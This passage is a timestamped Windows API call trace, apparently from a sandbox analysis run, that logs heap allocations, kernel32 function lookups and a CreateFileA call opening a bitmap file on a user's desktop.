Flags=0x0, Size=0x4) returned 0x8e1890 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.834] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0164.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd378 [0164.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0164.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.835] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0164.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.835] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0164.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0164.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x46) returned 0x9aa4f8 [0164.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", cchWideChar=70, lpMultiByteStr=0x9aa4f8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpUsedDefaultChar=0x0) returned 70 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.837] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\seoboseias.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=70, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c) returned 0x8edfa0 [0164.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=70, lpWideCharStr=0x8edfa0, cchWideChar=70 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp") returned 70 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.861] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.863] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0164.864] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.865] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.865] 